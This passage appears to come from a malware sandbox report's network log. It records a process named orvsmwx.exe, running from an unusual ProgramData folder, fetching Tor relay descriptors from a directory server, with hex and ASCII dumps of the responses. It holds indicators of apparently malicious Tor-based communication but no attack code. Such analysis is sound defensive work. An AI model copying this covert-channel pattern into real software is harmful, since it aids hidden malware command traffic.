32 20 46 6c 6f 77 43 74 72 6c 3d 31 2d 32 20 48 53 44 69 72 3d 32 20 48 53 49 6e 74 72 6f 3d 34 2d 35 20 48 53 52 65 6e 64 3d 31 2d 32 20 4c 69 6e 6b 3d 31 2d 35 20 4c 69 6e 6b 41 75 74 68 3d 31 2c 33 20 4d 69 63 72 6f 64 65 73 63 3d 31 2d 32 20 50 61 64 64 69 6e 67 3d 32 20 52 65 6c 61 79 3d 31 2d 34 0a 70 75 62 6c 69 73 68 65 64 20 32 30 32 32 2d 31 32 2d 31 31 20 30 33 3a 31 33 3a 32 36 0a 66 69 6e 67 65 72 70 72 69 6e 74 20 44 33 45 39 20 46 38 36 37 20 44 44 46 32 20 38 44 45 31 20 39 31 45 41 20 36 31 31 46 20 44 33 36 30 20 33 35 33 43 20 38 33 38 34 20 46 38 41 42 0a 75 70 74 69 6d 65 20 37 38 31 0a 62 61 6e 64 77 69 64 74 68 20 35 31 32 30 30 30 20 36 31 34 34 30 30 20 34 38 37 31 35 30 0a 65 78 74 72 61 2d 69 6e 66 6f 2d 64 69 67 65 73 74 20 36 45 39 31 45 32 42 37 41 31 42 38 30 38 39 46 45 41 32 31 43 36 39 37 30 30 33 38 46 44 33 34 41 33 43 31 36 36 39 34 20 62 31 78 61 39 57 32 5a 56 46 78 6c 36 2f 65 54 73 35 2f 75 4b 58 6d 57 7a 6a 4c 41 2b 77 6e 56 42 69 64 59 31 59 38 65 4c 44 4d 0a 6f 6e 69 6f 6e 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 4d 49 47 4a 41 6f 47 42 41 4e 61 5a 6a 45 6e 47 38 78 58 4f 53 51 42 53 58 63 68 79 39 6f 48 67 4c 75 47 4e 7a 66 6b 4f 6b 48 50 35 46 70 72 4a 64 56 71 64 38 37 42 31 51 68 48 77 33 75 2f 69 0a 4f 6a 75 51 73 2f 4b 69 41 30 51 34 2f 47 2b 67 57 75 69 43 33 78 68 6d 43 2b 6a 69 69 68 50 64 54 70 56 34 64 45 58 4d 63 66 73 78 6c 32 2f 6d 72 2b 6b 67 48 32 53 56 54 37 30 69 74 79 77 32 0a 62 4f 69 4e 57 41 2b 6d 7a 71 7a 76 47 6f 37 38 49 31 45 56 44 50 69 47 7a 42 75 46 47 78 4b 55 50 6e 49 73 74 6d 79 72 62 74 36 6a 57 5a 79 4a 7a 39 4e 42 41 67 4d 42 41 41 45 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 73 69 67 6e 69 6e 67 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 4d 49 47 4a 41 6f 47 42 41 4c 2f 67 7a 73 74 58 70 55 61 41 4c 68 6a 51 77 6d 77 48 71 4a
                          Data Ascii: router transtbb 84.155.152.82 14074 0 0identity-ed25519-----BEGIN ED25519 CERT-----AQQABxV6AQFVLbRbCeZ604P2tD8pIBGQNrOtjXuIZMasp0fB/c6QAQAgBABo560RR9EGj3UAYvjPvduapVWIOEW1OoPjpEGKO6AZpydJVYo/2124yMtbXNCthtdwqJ6tgsvpVrtpeOVMmlO4RUXBZZvPI9hXFNRwge87hzCcAcBmQtphX60ZYTf3UQk=-----END ED25519 CERT-----master-key-ed25519 aOetEUfRBo91AGL4z73bmqVViDhFtTqD46RBijugGacplatform Tor 0.4.7.11 on Linuxproto Cons=1-2 Desc=1-2 DirCache=2 FlowCtrl=1-2 HSDir=2 HSIntro=4-5 HSRend=1-2 Link=1-5 LinkAuth=1,3 Microdesc=1-2 Padding=2 Relay=1-4published 2022-12-11 03:13:26fingerprint D3E9 F867 DDF2 8DE1 91EA 611F D360 353C 8384 F8ABuptime 781bandwidth 512000 614400 487150extra-info-digest 6E91E2B7A1B8089FEA21C6970038FD34A3C16694 b1xa9W2ZVFxl6/eTs5/uKXmWzjLA+wnVBidY1Y8eLDMonion-key-----BEGIN RSA PUBLIC KEY-----MIGJAoGBANaZjEnG8xXOSQBSXchy9oHgLuGNzfkOkHP5FprJdVqd87B1QhHw3u/iOjuQs/KiA0Q4/G+gWuiC3xhmC+jiihPdTpV4dEXMcfsxl2/mr+kgH2SVT70ityw2bOiNWA+mzqzvGo78I1EVDPiGzBuFGxKUPnIstmyrbt6jWZyJz9NBAgMBAAE=-----END RSA PUBLIC KEY-----signing-key-----BEGIN RSA PUBLIC KEY-----MIGJAoGBAL/gzstXpUaALhjQwmwHqJ


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          25192.168.2.34972677.7.81.1409030C:\ProgramData\prfxiau\orvsmwx.exe
                          TimestampkBytes transferredDirectionData
                          Dec 11, 2022 09:26:01.861066103 CET5266OUTGET /tor/server/fp/38cc95a8ce92a591d4a5779359beffba13fa1b88 HTTP/1.0
                          Host: 77.7.81.140
                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                          Connection: close
                          Dec 11, 2022 09:26:01.907701015 CET5268INHTTP/1.0 200 OK
                          Date: Sun, 11 Dec 2022 08:26:01 GMT
                          Content-Type: text/plain
                          X-Your-Address-Is: 84.17.52.51
                          Content-Encoding: identity
                          Expires: Tue, 13 Dec 2022 08:26:01 GMT
                          Data Raw: 72 6f 75 74 65 72 20 54 79 6b 52 65 6c 61 79 30 32 20 39 35 2e 32 31 36 2e 31 30 31 2e 32 34 37 20 34 34 33 20 30 20 30 0a 69 64 65 6e 74 69 74 79 2d 65 64 32 35 35 31 39 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 41 51 51 41 42 78 55 72 41 55 32 49 64 6d 61 4e 62 69 6d 47 58 76 61 35 4e 53 6f 72 42 36 6a 7a 6b 4c 37 77 4d 62 36 6c 57 71 49 57 63 35 2f 74 37 37 4e 57 41 51 41 67 42 41 44 4f 35 49 68 73 0a 61 79 4f 70 57 69 31 62 2f 68 67 65 55 51 74 4b 63 51 34 78 4f 4b 66 79 57 6f 56 4f 54 64 70 2f 39 74 78 33 77 4b 77 55 76 77 47 6a 6c 64 4c 39 49 72 7a 50 77 66 62 76 68 4e 4b 37 30 35 69 47 0a 72 78 79 78 6c 2b 66 4d 69 67 47 4b 54 74 39 30 78 6f 44 76 76 46 51 31 50 51 6f 4a 2b 4b 2b 35 42 78 50 48 54 33 71 49 4d 2f 32 50 73 65 44 41 6a 47 44 35 4e 4b 76 65 35 67 41 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 6d 61 73 74 65 72 2d 6b 65 79 2d 65 64 32 35 35 31 39 20 7a 75 53 49 62 47 73 6a 71 56 6f 74 57 2f 34 59 48 6c 45 4c 53 6e 45 4f 4d 54 69 6e 38 6c 71 46 54 6b 33 61 66 2f 62 63 64 38 41 0a 6f 72 2d 61 64 64 72 65 73 73 20 5b 32 61 30 31 3a 34 66 39 3a 32 62 3a 31 35 31 66 3a 39 35 3a 32 31 36 3a 31 30 31 3a 32 34 37 5d 3a 34 34 33 0a 70 6c 61 74 66 6f 72 6d 20 54 6f 72 20 30 2e 34 2e 37 2e 31 30 20 6f 6e 20 46 72 65 65 42 53 44 0a 70 72 6f 74 6f 20 43 6f 6e 73 3d 31 2d 32 20 44 65 73 63 3d 31 2d 32 20 44 69 72 43 61 63 68 65 3d 32 20 46 6c 6f 77 43 74 72 6c 3d 31 2d 32 20 48 53 44 69 72 3d 32 20 48 53 49 6e 74 72 6f 3d 34 2d 35 20 48 53 52 65 6e 64 3d 31 2d 32 20 4c 69 6e 6b 3d 31 2d 35 20 4c 69 6e 6b 41 75 74 68 3d 31 2c 33 20 4d 69 63 72 6f 64 65 73 63 3d 31 2d 32 20 50 61 64 64 69 6e 67 3d 32 20 52 65 6c 61 79 3d 31 2d 34 0a 70 75 62 6c 69 73 68 65 64 20 32 30 32 32 2d 31 32 2d 31 30 20 32 30 3a 34 37 3a 31 34 0a 66 69 6e 67 65 72 70 72 69 6e 74 20 33 38 43 43 20 39 35 41 38 20 43 45 39 32 20 41 35 39 31 20 44 34 41 35 20 37 37 39 33 20 35 39 42 45 20 46 46 42 41 20 31 33 46 41 20 31 42 38 38 0a 75 70 74 69 6d 65 20 33 30 36 30 30 33 36 0a 62 61 6e 64 77 69 64 74 68 20 31 30 37 33 37 34 31 38 32 34 20 31 30 37 33 37 34 31 38 32 34 20 32 39 36 34 31 31 31 34 0a 65 78 74 72 61 2d 69 6e 66 6f 2d 64 69 67 65 73 74 20 44 35 43 39 37 35 32 36 43 30 43 33 43 46 38 46 41 34 39 44 43 39 38 30 37 39 45 33 33 41 35 38 35 35 39 45 45 45 33 44 20 61 74 4d 42 48 32 52 33 36 36 72 76 5a 74 59 6c 71 6c 79 58 62 32 34 6c 37 4a 6f 62 47 44 69 35 4a 51 65 67 39 61 43 70 73 54 30 0a 6f 6e 69 6f 6e 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 4d 49 47 4a 41 6f 47 42 41 4c 45 46 49 58 78 51 6c 6f 6f 73 51 54 69 48 52 32 48 33 42 76 31 77 4b 68 74 37 38 76 69 34 50 64 38 30 33 70 4e 32 6a 6b 6f 74 78 4c 77 74 66 46 4a 76 49 50 4a 78 0a 52 38 53 32 71 72 31 6a 55 53 6b 59 61 31 56 6b 31 52 52 70 6f 39 79 5a 50 6d 72 63 77 39 54 6d 6c 78 4d 78 75 34 55 4d 44 30 4e 58 6b 36 72 6e 77 61 5a 49 72 36 30 71 79 41 63 50 64 6e 70 34 0a 48 31 50 55 4b 54 77 4a 34 4b 75 6d 49 38 6b 37 34 69 6a 34 43 6c 52 62 38 6b 37 48 73 46 6b 51 6f 62 4a 31 43 2b 4d 61 59 56 53 68 53 32 37 66 49 49 6f 78 41 67 4d 42 41 41 45 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 73 69 67 6e 69 6e 67
                          Data Ascii: router TykRelay02 95.216.101.247 443 0 0identity-ed25519-----BEGIN ED25519 CERT-----AQQABxUrAU2IdmaNbimGXva5NSorB6jzkL7wMb6lWqIWc5/t77NWAQAgBADO5IhsayOpWi1b/hgeUQtKcQ4xOKfyWoVOTdp/9tx3wKwUvwGjldL9IrzPwfbvhNK705iGrxyxl+fMigGKTt90xoDvvFQ1PQoJ+K+5BxPHT3qIM/2PseDAjGD5NKve5gA=-----END ED25519 CERT-----master-key-ed25519 zuSIbGsjqVotW/4YHlELSnEOMTin8lqFTk3af/bcd8Aor-address [2a01:4f9:2b:151f:95:216:101:247]:443platform Tor 0.4.7.10 on FreeBSDproto Cons=1-2 Desc=1-2 DirCache=2 FlowCtrl=1-2 HSDir=2 HSIntro=4-5 HSRend=1-2 Link=1-5 LinkAuth=1,3 Microdesc=1-2 Padding=2 Relay=1-4published 2022-12-10 20:47:14fingerprint 38CC 95A8 CE92 A591 D4A5 7793 59BE FFBA 13FA 1B88uptime 3060036bandwidth 1073741824 1073741824 29641114extra-info-digest D5C97526C0C3CF8FA49DC98079E33A58559EEE3D atMBH2R366rvZtYlqlyXb24l7JobGDi5JQeg9aCpsT0onion-key-----BEGIN RSA PUBLIC KEY-----MIGJAoGBALEFIXxQloosQTiHR2H3Bv1wKht78vi4Pd803pN2jkotxLwtfFJvIPJxR8S2qr1jUSkYa1Vk1RRpo9yZPmrcw9TmlxMxu4UMD0NXk6rnwaZIr60qyAcPdnp4H1PUKTwJ4KumI8k74ij4ClRb8k7HsFkQobJ1C+MaYVShS27fIIoxAgMBAAE=-----END RSA PUBLIC KEY-----signing


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          26192.168.2.34972777.7.81.1409030C:\ProgramData\prfxiau\orvsmwx.exe
                          TimestampkBytes transferredDirectionData
                          Dec 11, 2022 09:26:02.308775902 CET5274OUTGET /tor/server/fp/d3e9f867ddf28de191ea611fd360353c8384f8ab HTTP/1.0
                          Host: 77.7.81.140
                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                          Connection: close
                          Dec 11, 2022 09:26:02.355377913 CET5276INHTTP/1.0 200 OK
                          Date: Sun, 11 Dec 2022 08:26:02 GMT
                          Content-Type: text/plain
                          X-Your-Address-Is: 84.17.52.51
                          Content-Encoding: identity
                          Expires: Tue, 13 Dec 2022 08:26:02 GMT
                          Data Raw: 72 6f 75 74 65 72 20 74 72 61 6e 73 74 62 62 20 38 34 2e 31 35 35 2e 31 35 32 2e 38 32 20 31 34 30 37 34 20 30 20 30 0a 69 64 65 6e 74 69 74 79 2d 65 64 32 35 35 31 39 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 41 51 51 41 42 78 56 36 41 51 46 56 4c 62 52 62 43 65 5a 36 30 34 50 32 74 44 38 70 49 42 47 51 4e 72 4f 74 6a 58 75 49 5a 4d 61 73 70 30 66 42 2f 63 36 51 41 51 41 67 42 41 42 6f 35 36 30 52 0a 52 39 45 47 6a 33 55 41 59 76 6a 50 76 64 75 61 70 56 57 49 4f 45 57 31 4f 6f 50 6a 70 45 47 4b 4f 36 41 5a 70 79 64 4a 56 59 6f 2f 32 31 32 34 79 4d 74 62 58 4e 43 74 68 74 64 77 71 4a 36 74 0a 67 73 76 70 56 72 74 70 65 4f 56 4d 6d 6c 4f 34 52 55 58 42 5a 5a 76 50 49 39 68 58 46 4e 52 77 67 65 38 37 68 7a 43 63 41 63 42 6d 51 74 70 68 58 36 30 5a 59 54 66 33 55 51 6b 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 6d 61 73 74 65 72 2d 6b 65 79 2d 65 64 32 35 35 31 39 20 61 4f 65 74 45 55 66 52 42 6f 39 31 41 47 4c 34 7a 37 33 62 6d 71 56 56 69 44 68 46 74 54 71 44 34 36 52 42 69 6a 75 67 47 61 63 0a 70 6c 61 74 66 6f 72 6d 20 54 6f 72 20 30 2e 34 2e 37 2e 31 31 20 6f 6e 20 4c 69 6e 75 78 0a 70 72 6f 74 6f 20 43 6f 6e 73 3d 31 2d 32 20 44 65 73 63 3d 31 2d 32 20 44 69 72 43 61 63 68 65 3d 32 20 46 6c 6f 77 43 74 72 6c 3d 31 2d 32 20 48 53 44 69 72 3d 32 20 48 53 49 6e 74 72 6f 3d 34 2d 35 20 48 53 52 65 6e 64 3d 31 2d 32 20 4c 69 6e 6b 3d 31 2d 35 20 4c 69 6e 6b 41 75 74 68 3d 31 2c 33 20 4d 69 63 72 6f 64 65 73 63 3d 31 2d 32 20 50 61 64 64 69 6e 67 3d 32 20 52 65 6c 61 79 3d 31 2d 34 0a 70 75 62 6c 69 73 68 65 64 20 32 30 32 32 2d 31 32 2d 31 31 20 30 33 3a 31 33 3a 32 36 0a 66 69 6e 67 65 72 70 72 69 6e 74 20 44 33 45 39 20 46 38 36 37 20 44 44 46 32 20 38 44 45 31 20 39 31 45 41 20 36 31 31 46 20 44 33 36 30 20 33 35 33 43 20 38 33 38 34 20 46 38 41 42 0a 75 70 74 69 6d 65 20 37 38 31 0a 62 61 6e 64 77 69 64 74 68 20 35 31 32 30 30 30 20 36 31 34 34 30 30 20 34 38 37 31 35 30 0a 65 78 74 72 61 2d 69 6e 66 6f 2d 64 69 67 65 73 74 20 36 45 39 31 45 32 42 37 41 31 42 38 30 38 39 46 45 41 32 31 43 36 39 37 30 30 33 38 46 44 33 34 41 33 43 31 36 36 39 34 20 62 31 78 61 39 57 32 5a 56 46 78 6c 36 2f 65 54 73 35 2f 75 4b 58 6d 57 7a 6a 4c 41 2b 77 6e 56 42 69 64 59 31 59 38 65 4c 44 4d 0a 6f 6e 69 6f 6e 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 4d 49 47 4a 41 6f 47 42 41 4e 61 5a 6a 45 6e 47 38 78 58 4f 53 51 42 53 58 63 68 79 39 6f 48 67 4c 75 47 4e 7a 66 6b 4f 6b 48 50 35 46 70 72 4a 64 56 71 64 38 37 42 31 51 68 48 77 33 75 2f 69 0a 4f 6a 75 51 73 2f 4b 69 41 30 51 34 2f 47 2b 67 57 75 69 43 33 78 68 6d 43 2b 6a 69 69 68 50 64 54 70 56 34 64 45 58 4d 63 66 73 78 6c 32 2f 6d 72 2b 6b 67 48 32 53 56 54 37 30 69 74 79 77 32 0a 62 4f 69 4e 57 41 2b 6d 7a 71 7a 76 47 6f 37 38 49 31 45 56 44 50 69 47 7a 42 75 46 47 78 4b 55 50 6e 49 73 74 6d 79 72 62 74 36 6a 57 5a 79 4a 7a 39 4e 42 41 67 4d 42 41 41 45 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 73 69 67 6e 69 6e 67 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 4d 49 47 4a 41 6f 47 42 41 4c 2f 67 7a 73 74 58 70 55 61 41 4c 68 6a 51 77 6d 77 48 71 4a
                          Data Ascii: router transtbb 84.155.152.82 14074 0 0identity-ed25519-----BEGIN ED25519 CERT-----AQQABxV6AQFVLbRbCeZ604P2tD8pIBGQNrOtjXuIZMasp0fB/c6QAQAgBABo560RR9EGj3UAYvjPvduapVWIOEW1OoPjpEGKO6AZpydJVYo/2124yMtbXNCthtdwqJ6tgsvpVrtpeOVMmlO4RUXBZZvPI9hXFNRwge87hzCcAcBmQtphX60ZYTf3UQk=-----END ED25519 CERT-----master-key-ed25519 aOetEUfRBo91AGL4z73bmqVViDhFtTqD46RBijugGacplatform Tor 0.4.7.11 on Linuxproto Cons=1-2 Desc=1-2 DirCache=2 FlowCtrl=1-2 HSDir=2 HSIntro=4-5 HSRend=1-2 Link=1-5 LinkAuth=1,3 Microdesc=1-2 Padding=2 Relay=1-4published 2022-12-11 03:13:26fingerprint D3E9 F867 DDF2 8DE1 91EA 611F D360 353C 8384 F8ABuptime 781bandwidth 512000 614400 487150extra-info-digest 6E91E2B7A1B8089FEA21C6970038FD34A3C16694 b1xa9W2ZVFxl6/eTs5/uKXmWzjLA+wnVBidY1Y8eLDMonion-key-----BEGIN RSA PUBLIC KEY-----MIGJAoGBANaZjEnG8xXOSQBSXchy9oHgLuGNzfkOkHP5FprJdVqd87B1QhHw3u/iOjuQs/KiA0Q4/G+gWuiC3xhmC+jiihPdTpV4dEXMcfsxl2/mr+kgH2SVT70ityw2bOiNWA+mzqzvGo78I1EVDPiGzBuFGxKUPnIstmyrbt6jWZyJz9NBAgMBAAE=-----END RSA PUBLIC KEY-----signing-key-----BEGIN RSA PUBLIC KEY-----MIGJAoGBAL/gzstXpUaALhjQwmwHqJ


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          27192.168.2.34972877.7.81.1409030C:\ProgramData\prfxiau\orvsmwx.exe
                          TimestampkBytes transferredDirectionData
                          Dec 11, 2022 09:26:02.513144970 CET5279OUTGET /tor/server/fp/38e73023a9792cdb8adcd4d1b2a220effe8d8ff5 HTTP/1.0
                          Host: 77.7.81.140
                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                          Connection: close
                          Dec 11, 2022 09:26:02.560026884 CET5281INHTTP/1.0 200 OK
                          Date: Sun, 11 Dec 2022 08:26:02 GMT
                          Content-Type: text/plain
                          X-Your-Address-Is: 84.17.52.51
                          Content-Encoding: identity
                          Expires: Tue, 13 Dec 2022 08:26:02 GMT
                          Data Raw: 72 6f 75 74 65 72 20 61 6c 70 68 61 31 33 37 20 37 30 2e 33 34 2e 31 39 34 2e 31 38 39 20 34 34 33 20 30 20 30 0a 69 64 65 6e 74 69 74 79 2d 65 64 32 35 35 31 39 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 41 51 51 41 42 78 5a 56 41 56 54 66 5a 64 74 58 6d 6f 41 30 49 39 55 38 77 78 48 49 64 5a 33 69 63 68 55 7a 74 2f 70 35 4c 50 33 72 53 6a 72 55 71 2f 61 73 41 51 41 67 42 41 43 2b 6f 61 2f 75 0a 50 51 33 57 34 4f 48 6b 49 76 37 79 2f 2f 52 32 7a 6f 36 39 44 37 6b 4f 74 67 42 43 55 77 33 73 50 65 66 55 70 2b 52 31 66 65 33 78 2b 69 65 46 49 46 66 2b 67 78 4f 75 6c 74 57 63 45 55 61 41 0a 77 53 56 42 78 69 6f 55 47 77 71 33 35 32 4d 63 79 76 65 33 67 58 50 43 56 32 73 37 61 53 77 50 61 79 57 6a 68 72 47 57 52 78 78 2f 76 54 61 50 6e 46 63 62 55 56 66 4a 66 67 67 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 6d 61 73 74 65 72 2d 6b 65 79 2d 65 64 32 35 35 31 39 20 76 71 47 76 37 6a 30 4e 31 75 44 68 35 43 4c 2b 38 76 2f 30 64 73 36 4f 76 51 2b 35 44 72 59 41 51 6c 4d 4e 37 44 33 6e 31 4b 63 0a 6f 72 2d 61 64 64 72 65 73 73 20 5b 32 61 30 35 3a 66 34 38 30 3a 32 30 30 30 3a 32 66 66 64 3a 35 34 30 30 3a 34 66 66 3a 66 65 32 37 3a 62 34 34 62 5d 3a 34 34 33 0a 70 6c 61 74 66 6f 72 6d 20 54 6f 72 20 30 2e 34 2e 37 2e 31 31 20 6f 6e 20 4c 69 6e 75 78 0a 70 72 6f 74 6f 20 43 6f 6e 73 3d 31 2d 32 20 44 65 73 63 3d 31 2d 32 20 44 69 72 43 61 63 68 65 3d 32 20 46 6c 6f 77 43 74 72 6c 3d 31 2d 32 20 48 53 44 69 72 3d 32 20 48 53 49 6e 74 72 6f 3d 34 2d 35 20 48 53 52 65 6e 64 3d 31 2d 32 20 4c 69 6e 6b 3d 31 2d 35 20 4c 69 6e 6b 41 75 74 68 3d 31 2c 33 20 4d 69 63 72 6f 64 65 73 63 3d 31 2d 32 20 50 61 64 64 69 6e 67 3d 32 20 52 65 6c 61 79 3d 31 2d 34 0a 70 75 62 6c 69 73 68 65 64 20 32 30 32 32 2d 31 32 2d 31 31 20 30 33 3a 35 32 3a 31 34 0a 66 69 6e 67 65 72 70 72 69 6e 74 20 33 38 45 37 20 33 30 32 33 20 41 39 37 39 20 32 43 44 42 20 38 41 44 43 20 44 34 44 31 20 42 32 41 32 20 32 30 45 46 20 46 45 38 44 20 38 46 46 35 0a 75 70 74 69 6d 65 20 36 34 38 30 35 35 0a 62 61 6e 64 77 69 64 74 68 20 32 38 36 37 32 30 30 20 36 31 34 34 30 30 30 20 33 30 35 37 34 30 38 0a 65 78 74 72 61 2d 69 6e 66 6f 2d 64 69 67 65 73 74 20 35 45 36 33 34 39 43 35 46 32 34 35 35 34 45 44 39 43 42 38 34 31 42 42 39 44 39 32 31 46 32 41 33 39 30 30 36 43 32 42 20 75 50 69 59 50 77 6f 66 33 51 4c 47 2f 6c 46 4d 59 5a 79 5a 45 47 75 57 75 6f 52 57 57 34 74 43 41 66 6b 2b 49 47 38 55 41 50 51 0a 6f 6e 69 6f 6e 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 4d 49 47 4a 41 6f 47 42 41 4d 58 4b 46 6c 67 30 44 33 62 6a 71 73 41 43 44 34 78 77 41 54 35 59 43 78 78 65 42 4c 54 31 4f 49 73 42 7a 66 32 79 50 42 69 44 37 33 33 64 48 41 36 71 42 75 51 70 0a 67 77 61 6e 2f 42 75 4e 61 71 30 6b 74 39 71 35 30 58 39 36 42 42 58 30 6c 37 73 6c 37 6a 61 70 78 39 2f 50 76 67 64 4d 30 2b 59 74 4f 55 74 48 61 71 4c 41 35 79 68 50 66 52 42 48 58 2b 31 4e 0a 4d 65 2b 6b 59 51 69 46 74 64 44 55 57 49 49 7a 4c 74 49 6f 74 44 34 77 67 4b 4a 4c 6d 66 36 4c 6b 53 4e 63 38 47 53 66 54 5a 4b 32 70 74 53 52 36 4f 6d 6e 41 67 4d 42 41 41 45 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 73 69 67 6e 69 6e 67 2d 6b 65 79 0a 2d
                          Data Ascii: router alpha137 70.34.194.189 443 0 0identity-ed25519-----BEGIN ED25519 CERT-----AQQABxZVAVTfZdtXmoA0I9U8wxHIdZ3ichUzt/p5LP3rSjrUq/asAQAgBAC+oa/uPQ3W4OHkIv7y//R2zo69D7kOtgBCUw3sPefUp+R1fe3x+ieFIFf+gxOultWcEUaAwSVBxioUGwq352Mcyve3gXPCV2s7aSwPayWjhrGWRxx/vTaPnFcbUVfJfgg=-----END ED25519 CERT-----master-key-ed25519 vqGv7j0N1uDh5CL+8v/0ds6OvQ+5DrYAQlMN7D3n1Kcor-address [2a05:f480:2000:2ffd:5400:4ff:fe27:b44b]:443platform Tor 0.4.7.11 on Linuxproto Cons=1-2 Desc=1-2 DirCache=2 FlowCtrl=1-2 HSDir=2 HSIntro=4-5 HSRend=1-2 Link=1-5 LinkAuth=1,3 Microdesc=1-2 Padding=2 Relay=1-4published 2022-12-11 03:52:14fingerprint 38E7 3023 A979 2CDB 8ADC D4D1 B2A2 20EF FE8D 8FF5uptime 648055bandwidth 2867200 6144000 3057408extra-info-digest 5E6349C5F24554ED9CB841BB9D921F2A39006C2B uPiYPwof3QLG/lFMYZyZEGuWuoRWW4tCAfk+IG8UAPQonion-key-----BEGIN RSA PUBLIC KEY-----MIGJAoGBAMXKFlg0D3bjqsACD4xwAT5YCxxeBLT1OIsBzf2yPBiD733dHA6qBuQpgwan/BuNaq0kt9q50X96BBX0l7sl7japx9/PvgdM0+YtOUtHaqLA5yhPfRBHX+1NMe+kYQiFtdDUWIIzLtIotD4wgKJLmf6LkSNc8GSfTZK2ptSR6OmnAgMBAAE=-----END RSA PUBLIC KEY-----signing-key-


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          28192.168.2.34972977.7.81.1409030C:\ProgramData\prfxiau\orvsmwx.exe
                          TimestampkBytes transferredDirectionData
                          Dec 11, 2022 09:26:22.776928902 CET5285OUTGET /tor/server/fp/d3e9f867ddf28de191ea611fd360353c8384f8ab HTTP/1.0
                          Host: 77.7.81.140
                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                          Connection: close
                          Dec 11, 2022 09:26:27.584422112 CET5286INHTTP/1.0 200 OK
                          Date: Sun, 11 Dec 2022 08:26:27 GMT
                          Content-Type: text/plain
                          X-Your-Address-Is: 84.17.52.51
                          Content-Encoding: identity
                          Expires: Tue, 13 Dec 2022 08:26:27 GMT
                          Data Raw: 72 6f 75 74 65 72 20 74 72 61 6e 73 74 62 62 20 38 34 2e 31 35 35 2e 31 35 32 2e 38 32 20 31 34 30 37 34 20 30 20 30 0a 69 64 65 6e 74 69 74 79 2d 65 64 32 35 35 31 39 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 41 51 51 41 42 78 56 36 41 51 46 56 4c 62 52 62 43 65 5a 36 30 34 50 32 74 44 38 70 49 42 47 51 4e 72 4f 74 6a 58 75 49 5a 4d 61 73 70 30 66 42 2f 63 36 51 41 51 41 67 42 41 42 6f 35 36 30 52 0a 52 39 45 47 6a 33 55 41 59 76 6a 50 76 64 75 61 70 56 57 49 4f 45 57 31 4f 6f 50 6a 70 45 47 4b 4f 36 41 5a 70 79 64 4a 56 59 6f 2f 32 31 32 34 79 4d 74 62 58 4e 43 74 68 74 64 77 71 4a 36 74 0a 67 73 76 70 56 72 74 70 65 4f 56 4d 6d 6c 4f 34 52 55 58 42 5a 5a 76 50 49 39 68 58 46 4e 52 77 67 65 38 37 68 7a 43 63 41 63 42 6d 51 74 70 68 58 36 30 5a 59 54 66 33 55 51 6b 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 6d 61 73 74 65 72 2d 6b 65 79 2d 65 64 32 35 35 31 39 20 61 4f 65 74 45 55 66 52 42 6f 39 31 41 47 4c 34 7a 37 33 62 6d 71 56 56 69 44 68 46 74 54 71 44 34 36 52 42 69 6a 75 67 47 61 63 0a 70 6c 61 74 66 6f 72 6d 20 54 6f 72 20 30 2e 34 2e 37 2e 31 31 20 6f 6e 20 4c 69 6e 75 78 0a 70 72 6f 74 6f 20 43 6f 6e 73 3d 31 2d 32 20 44 65 73 63 3d 31 2d 32 20 44 69 72 43 61 63 68 65 3d 32 20 46 6c 6f 77 43 74 72 6c 3d 31 2d 32 20 48 53 44 69 72 3d 32 20 48 53 49 6e 